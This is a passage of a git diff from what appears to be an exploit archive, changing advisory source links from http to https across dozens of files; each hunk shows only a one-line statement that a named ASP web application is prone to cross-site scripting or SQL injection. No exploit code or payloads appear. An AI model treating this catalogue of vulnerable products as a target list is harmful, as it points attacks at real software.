@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16216/info +source: https://www.securityfocus.com/bid/16216/info FogBugz is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27079.txt b/exploits/asp/webapps/27079.txt index ed01d550d..064309c80 100644 --- a/exploits/asp/webapps/27079.txt +++ b/exploits/asp/webapps/27079.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16234/info +source: https://www.securityfocus.com/bid/16234/info Helm is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27083.txt b/exploits/asp/webapps/27083.txt index 1625e8355..38005c4b1 100644 --- a/exploits/asp/webapps/27083.txt +++ b/exploits/asp/webapps/27083.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16243/info +source: https://www.securityfocus.com/bid/16243/info SimpleBlog is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27142.txt b/exploits/asp/webapps/27142.txt index e4a89fd45..9b0f1825c 100644 --- a/exploits/asp/webapps/27142.txt +++ b/exploits/asp/webapps/27142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16404/info +source: https://www.securityfocus.com/bid/16404/info ASPThai Forums is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27143.txt b/exploits/asp/webapps/27143.txt index 9c314b3b4..c371ddd8b 100644 --- a/exploits/asp/webapps/27143.txt +++ b/exploits/asp/webapps/27143.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16406/info +source: https://www.securityfocus.com/bid/16406/info ZixForum is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27151.txt b/exploits/asp/webapps/27151.txt index 030022a8e..40e7d8b7e 100644 --- a/exploits/asp/webapps/27151.txt +++ b/exploits/asp/webapps/27151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16433/info +source: https://www.securityfocus.com/bid/16433/info Daffodil CRM is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27160.txt b/exploits/asp/webapps/27160.txt index ba7cf20eb..117af4403 100644 --- a/exploits/asp/webapps/27160.txt +++ b/exploits/asp/webapps/27160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16471/info +source: https://www.securityfocus.com/bid/16471/info SoftMaker Shop is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input. diff --git a/exploits/asp/webapps/27161.txt b/exploits/asp/webapps/27161.txt index 32b9544bb..c8de82c26 100644 --- a/exploits/asp/webapps/27161.txt +++ b/exploits/asp/webapps/27161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16473/info +source: https://www.securityfocus.com/bid/16473/info CyberShop Ultimate E-commerce is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27169.txt b/exploits/asp/webapps/27169.txt index 2baa7bed3..86a9774a0 100644 --- a/exploits/asp/webapps/27169.txt +++ b/exploits/asp/webapps/27169.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16544/info +source: https://www.securityfocus.com/bid/16544/info Whomp! Real Estate Manager is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27174.txt b/exploits/asp/webapps/27174.txt index e49ba42f5..eb4f24460 100644 --- a/exploits/asp/webapps/27174.txt +++ b/exploits/asp/webapps/27174.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16563/info +source: https://www.securityfocus.com/bid/16563/info GA's Forum Light is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27310.txt b/exploits/asp/webapps/27310.txt index f03eee527..311adeec8 100644 --- a/exploits/asp/webapps/27310.txt +++ b/exploits/asp/webapps/27310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16821/info +source: https://www.securityfocus.com/bid/16821/info Battleaxe Software's bttlxeForum is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27469.txt b/exploits/asp/webapps/27469.txt index 8c3350250..b3fea78ad 100644 --- a/exploits/asp/webapps/27469.txt +++ b/exploits/asp/webapps/27469.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17236/info +source: https://www.securityfocus.com/bid/17236/info EZHomePagePro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27470.txt b/exploits/asp/webapps/27470.txt index 21f2a63c3..8a0b3694d 100644 --- a/exploits/asp/webapps/27470.txt +++ b/exploits/asp/webapps/27470.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17236/info +source: https://www.securityfocus.com/bid/17236/info EZHomePagePro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27471.txt b/exploits/asp/webapps/27471.txt index 2f2398c5a..92b199d8a 100644 --- a/exploits/asp/webapps/27471.txt +++ b/exploits/asp/webapps/27471.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17236/info +source: https://www.securityfocus.com/bid/17236/info EZHomePagePro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27472.txt b/exploits/asp/webapps/27472.txt index 33884601a..34bbdbe2b 100644 --- a/exploits/asp/webapps/27472.txt +++ b/exploits/asp/webapps/27472.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17236/info +source: https://www.securityfocus.com/bid/17236/info EZHomePagePro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27473.txt b/exploits/asp/webapps/27473.txt index 45a0d8f5e..0325530b8 100644 --- a/exploits/asp/webapps/27473.txt +++ b/exploits/asp/webapps/27473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17236/info +source: https://www.securityfocus.com/bid/17236/info EZHomePagePro is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27479.txt b/exploits/asp/webapps/27479.txt index 10251a1e9..9ae8626b6 100644 --- a/exploits/asp/webapps/27479.txt +++ b/exploits/asp/webapps/27479.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17249/info +source: https://www.securityfocus.com/bid/17249/info Toast Forums is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27480.txt b/exploits/asp/webapps/27480.txt index 204084686..283c0dae5 100644 --- a/exploits/asp/webapps/27480.txt +++ b/exploits/asp/webapps/27480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17255/info +source: https://www.securityfocus.com/bid/17255/info Online Quiz System is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27481.txt b/exploits/asp/webapps/27481.txt index ee5ed450e..0167ec70a 100644 --- a/exploits/asp/webapps/27481.txt +++ b/exploits/asp/webapps/27481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17255/info +source: https://www.securityfocus.com/bid/17255/info Online Quiz System is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27482.txt b/exploits/asp/webapps/27482.txt index e9d5052bd..a94055425 100644 --- a/exploits/asp/webapps/27482.txt +++ b/exploits/asp/webapps/27482.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17257/info +source: https://www.securityfocus.com/bid/17257/info Caloris Planitia Technologies School Management System is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27486.txt b/exploits/asp/webapps/27486.txt index 9c2e5a63a..aa1ba185c 100644 --- a/exploits/asp/webapps/27486.txt +++ b/exploits/asp/webapps/27486.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17263/info +source: https://www.securityfocus.com/bid/17263/info Helm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27487.txt b/exploits/asp/webapps/27487.txt index 92c09c02d..ac0c02227 100644 --- a/exploits/asp/webapps/27487.txt +++ b/exploits/asp/webapps/27487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17263/info +source: https://www.securityfocus.com/bid/17263/info Helm is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27536.txt b/exploits/asp/webapps/27536.txt index 283d29649..bcda9f118 100644 --- a/exploits/asp/webapps/27536.txt +++ b/exploits/asp/webapps/27536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17332/info +source: https://www.securityfocus.com/bid/17332/info SiteSearch Indexer is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27552.txt b/exploits/asp/webapps/27552.txt index 8a4e76d57..e240f2f6b 100644 --- a/exploits/asp/webapps/27552.txt +++ b/exploits/asp/webapps/27552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17347/info +source: https://www.securityfocus.com/bid/17347/info Site Man is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27757.txt b/exploits/asp/webapps/27757.txt index b2037bb5f..04eee7886 100644 --- a/exploits/asp/webapps/27757.txt +++ b/exploits/asp/webapps/27757.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17722/info +source: https://www.securityfocus.com/bid/17722/info DUclassified is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27813.txt b/exploits/asp/webapps/27813.txt index 22e7b64f5..4a5373186 100644 --- a/exploits/asp/webapps/27813.txt +++ b/exploits/asp/webapps/27813.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17829/info +source: https://www.securityfocus.com/bid/17829/info CyberBuild is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27814.txt b/exploits/asp/webapps/27814.txt index d32a271d0..9019c7409 100644 --- a/exploits/asp/webapps/27814.txt +++ b/exploits/asp/webapps/27814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17829/info +source: https://www.securityfocus.com/bid/17829/info CyberBuild is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27815.txt b/exploits/asp/webapps/27815.txt index 38cd827cd..1fe00a08c 100644 --- a/exploits/asp/webapps/27815.txt +++ b/exploits/asp/webapps/27815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17829/info +source: https://www.securityfocus.com/bid/17829/info CyberBuild is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/asp/webapps/27816.txt b/exploits/asp/webapps/27816.txt index e80a405d5..3de36b7ed 100644 --- a/exploits/asp/webapps/27816.txt +++ b/exploits/asp/webapps/27816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17829/info +source: https://www.securityfocus.com/bid/17829/info CyberBuild is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27817.txt b/exploits/asp/webapps/27817.txt index 8891d42bd..62895b9bb 100644 --- a/exploits/asp/webapps/27817.txt +++ b/exploits/asp/webapps/27817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17829/info +source: https://www.securityfocus.com/bid/17829/info CyberBuild is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27825.txt b/exploits/asp/webapps/27825.txt index 891ea15e5..8850a8f9d 100644 --- a/exploits/asp/webapps/27825.txt +++ b/exploits/asp/webapps/27825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17877/info +source: https://www.securityfocus.com/bid/17877/info Calendar Manager Pro is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27826.txt b/exploits/asp/webapps/27826.txt index ae2f8e313..7f4dc81ef 100644 --- a/exploits/asp/webapps/27826.txt +++ b/exploits/asp/webapps/27826.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17877/info +source: https://www.securityfocus.com/bid/17877/info Calendar Manager Pro is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27827.txt b/exploits/asp/webapps/27827.txt index 0a8b139df..69ca08dd3 100644 --- a/exploits/asp/webapps/27827.txt +++ b/exploits/asp/webapps/27827.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17877/info +source: https://www.securityfocus.com/bid/17877/info Calendar Manager Pro is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27828.txt b/exploits/asp/webapps/27828.txt index 198ffc483..e306d0aa4 100644 --- a/exploits/asp/webapps/27828.txt +++ b/exploits/asp/webapps/27828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17877/info +source: https://www.securityfocus.com/bid/17877/info Calendar Manager Pro is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27842.txt b/exploits/asp/webapps/27842.txt index 5748037fc..a657f65bc 100644 --- a/exploits/asp/webapps/27842.txt +++ b/exploits/asp/webapps/27842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17903/info +source: https://www.securityfocus.com/bid/17903/info MultiCalendars is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 
diff --git a/exploits/asp/webapps/27844.txt b/exploits/asp/webapps/27844.txt index aeb1a2131..6282d82c0 100644 --- a/exploits/asp/webapps/27844.txt +++ b/exploits/asp/webapps/27844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17907/info +source: https://www.securityfocus.com/bid/17907/info EPublisherPro is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27846.txt b/exploits/asp/webapps/27846.txt index 1190e340b..a38ea3b98 100644 --- a/exploits/asp/webapps/27846.txt +++ b/exploits/asp/webapps/27846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17911/info +source: https://www.securityfocus.com/bid/17911/info EImagePro is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/27849.txt b/exploits/asp/webapps/27849.txt index c9c2b03a2..783fa3a1a 100644 --- a/exploits/asp/webapps/27849.txt +++ b/exploits/asp/webapps/27849.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17912/info +source: https://www.securityfocus.com/bid/17912/info EDirectoryPro is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27890.txt b/exploits/asp/webapps/27890.txt index 5db515e08..662e4f680 100644 --- a/exploits/asp/webapps/27890.txt +++ b/exploits/asp/webapps/27890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18013/info +source: https://www.securityfocus.com/bid/18013/info Open Wiki is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 
diff --git a/exploits/asp/webapps/27896.txt b/exploits/asp/webapps/27896.txt index 14b62c840..83b6020a0 100644 --- a/exploits/asp/webapps/27896.txt +++ b/exploits/asp/webapps/27896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18025/info +source: https://www.securityfocus.com/bid/18025/info ASPBB is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27897.txt b/exploits/asp/webapps/27897.txt index ca8bf0a73..f3dd83a03 100644 --- a/exploits/asp/webapps/27897.txt +++ b/exploits/asp/webapps/27897.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18025/info +source: https://www.securityfocus.com/bid/18025/info ASPBB is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27898.txt b/exploits/asp/webapps/27898.txt index ed045e650..5cad742d6 100644 --- a/exploits/asp/webapps/27898.txt +++ b/exploits/asp/webapps/27898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18031/info +source: https://www.securityfocus.com/bid/18031/info CodeAvalanche News is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/27913.txt b/exploits/asp/webapps/27913.txt index 669d8bc79..e032db806 100644 --- a/exploits/asp/webapps/27913.txt +++ b/exploits/asp/webapps/27913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18126/info +source: https://www.securityfocus.com/bid/18126/info Mini-NUKE is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. 
diff --git a/exploits/asp/webapps/27918.txt b/exploits/asp/webapps/27918.txt index 5aea59935..b14c2f435 100644 --- a/exploits/asp/webapps/27918.txt +++ b/exploits/asp/webapps/27918.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18146/info +source: https://www.securityfocus.com/bid/18146/info ASPBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27932.txt b/exploits/asp/webapps/27932.txt index cdf6aef95..45a5740f0 100644 --- a/exploits/asp/webapps/27932.txt +++ b/exploits/asp/webapps/27932.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18205/info +source: https://www.securityfocus.com/bid/18205/info Hogstorps guestbook is prone to an access-authorization vulnerability. The issue occurs because the affected script fails to prompt for authentication credentials. diff --git a/exploits/asp/webapps/27945.txt b/exploits/asp/webapps/27945.txt index 66b1c22c1..5233c26bc 100644 --- a/exploits/asp/webapps/27945.txt +++ b/exploits/asp/webapps/27945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18226/info +source: https://www.securityfocus.com/bid/18226/info Enigma Haber is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/27960.txt b/exploits/asp/webapps/27960.txt index ee3204eaf..c5db69e56 100644 --- a/exploits/asp/webapps/27960.txt +++ b/exploits/asp/webapps/27960.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18254/info +source: https://www.securityfocus.com/bid/18254/info LocazoList Classifieds is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28002.txt b/exploits/asp/webapps/28002.txt index 69f55d649..708729984 100644 
--- a/exploits/asp/webapps/28002.txt +++ b/exploits/asp/webapps/28002.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18379/info +source: https://www.securityfocus.com/bid/18379/info KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28003.txt b/exploits/asp/webapps/28003.txt index b129c1f11..d77aecffa 100644 --- a/exploits/asp/webapps/28003.txt +++ b/exploits/asp/webapps/28003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18379/info +source: https://www.securityfocus.com/bid/18379/info KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28004.txt b/exploits/asp/webapps/28004.txt index 7d8b073b2..a41b50698 100644 --- a/exploits/asp/webapps/28004.txt +++ b/exploits/asp/webapps/28004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18379/info +source: https://www.securityfocus.com/bid/18379/info KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28061.txt b/exploits/asp/webapps/28061.txt index 9bd435935..704ebf765 100644 --- a/exploits/asp/webapps/28061.txt +++ b/exploits/asp/webapps/28061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18504/info +source: https://www.securityfocus.com/bid/18504/info Cisco CallManager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the web-interface to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28062.txt b/exploits/asp/webapps/28062.txt index 62e352718..a7b2a3961 100644 --- a/exploits/asp/webapps/28062.txt +++ b/exploits/asp/webapps/28062.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18504/info +source: https://www.securityfocus.com/bid/18504/info Cisco CallManager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the web-interface to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/28086.txt b/exploits/asp/webapps/28086.txt index bceba7311..6a7932b6e 100644 --- a/exploits/asp/webapps/28086.txt +++ b/exploits/asp/webapps/28086.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18563/info +source: https://www.securityfocus.com/bid/18563/info Maximus SchoolMAX is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/asp/webapps/28193.txt b/exploits/asp/webapps/28193.txt index 4da5a6583..feea97c29 100644 --- a/exploits/asp/webapps/28193.txt +++ b/exploits/asp/webapps/28193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18899/info +source: https://www.securityfocus.com/bid/18899/info Webvizyon is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28203.txt b/exploits/asp/webapps/28203.txt index b68709671..58d355622 100644 --- a/exploits/asp/webapps/28203.txt +++ b/exploits/asp/webapps/28203.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18933/info +source: https://www.securityfocus.com/bid/18933/info Hosting Controller is prone to a cross-site scripting vulnerability because it fails to sanitize input before displaying it to users of the application. diff --git a/exploits/asp/webapps/28208.txt b/exploits/asp/webapps/28208.txt index 7c0100e4d..4fee444a3 100644 --- a/exploits/asp/webapps/28208.txt +++ b/exploits/asp/webapps/28208.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18948/info +source: https://www.securityfocus.com/bid/18948/info FlexWatch is prone to an authorization-bypass vulnerability. This issue is due to a failure in the application to properly verify user-supplied input. diff --git a/exploits/asp/webapps/28339.txt b/exploits/asp/webapps/28339.txt index e995cc83d..258a7d336 100644 --- a/exploits/asp/webapps/28339.txt +++ b/exploits/asp/webapps/28339.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19330/info +source: https://www.securityfocus.com/bid/19330/info anychart is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28385.txt b/exploits/asp/webapps/28385.txt index 51314ac5d..d2ead2d9b 100644 --- a/exploits/asp/webapps/28385.txt +++ b/exploits/asp/webapps/28385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19513/info +source: https://www.securityfocus.com/bid/19513/info Multiple cross-site scripting vulnerabilities affect BlaBla 4U because the application fails to properly sanitize user-supplied input before including it in dynamically generated web content. diff --git a/exploits/asp/webapps/28443.html b/exploits/asp/webapps/28443.html index 72918c270..ea7b2ae16 100644 --- a/exploits/asp/webapps/28443.html +++ b/exploits/asp/webapps/28443.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19768/info +source: https://www.securityfocus.com/bid/19768/info Digiappz Freekot is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/28566.txt b/exploits/asp/webapps/28566.txt index bbff5a46e..08dada462 100644 --- a/exploits/asp/webapps/28566.txt +++ b/exploits/asp/webapps/28566.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20004/info +source: https://www.securityfocus.com/bid/20004/info Snitz Forums 2000 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/28577.txt b/exploits/asp/webapps/28577.txt index 7c3f20329..415b2428e 100644 --- a/exploits/asp/webapps/28577.txt +++ b/exploits/asp/webapps/28577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20033/info +source: https://www.securityfocus.com/bid/20033/info ClickBlog! is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28587.txt b/exploits/asp/webapps/28587.txt index 8b093e8f2..1e186cf7d 100644 --- a/exploits/asp/webapps/28587.txt +++ b/exploits/asp/webapps/28587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20049/info +source: https://www.securityfocus.com/bid/20049/info EasyPage is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28589.txt b/exploits/asp/webapps/28589.txt index 5dfd49598..7e4b057c0 100644 --- a/exploits/asp/webapps/28589.txt +++ b/exploits/asp/webapps/28589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20054/info +source: https://www.securityfocus.com/bid/20054/info Web Wiz Forums is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/28593.txt b/exploits/asp/webapps/28593.txt index d6d866415..a9fece293 100644 --- a/exploits/asp/webapps/28593.txt +++ b/exploits/asp/webapps/28593.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20062/info +source: https://www.securityfocus.com/bid/20062/info ZilekPortal is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28597.txt b/exploits/asp/webapps/28597.txt index aa22f6f9b..667d21c21 100644 --- a/exploits/asp/webapps/28597.txt +++ b/exploits/asp/webapps/28597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20080/info +source: https://www.securityfocus.com/bid/20080/info ECardPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28600.txt b/exploits/asp/webapps/28600.txt index eefacfc22..9cc2676a5 100644 --- a/exploits/asp/webapps/28600.txt +++ b/exploits/asp/webapps/28600.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20089/info +source: https://www.securityfocus.com/bid/20089/info EShoppingPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/28615.txt b/exploits/asp/webapps/28615.txt index 03306c4fb..231c52886 100644 --- a/exploits/asp/webapps/28615.txt +++ b/exploits/asp/webapps/28615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20117/info +source: https://www.securityfocus.com/bid/20117/info DotNetNuke is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/asp/webapps/28742.txt b/exploits/asp/webapps/28742.txt index dd6e82d3d..68e8ac43b 100644 --- a/exploits/asp/webapps/28742.txt +++ b/exploits/asp/webapps/28742.txt 
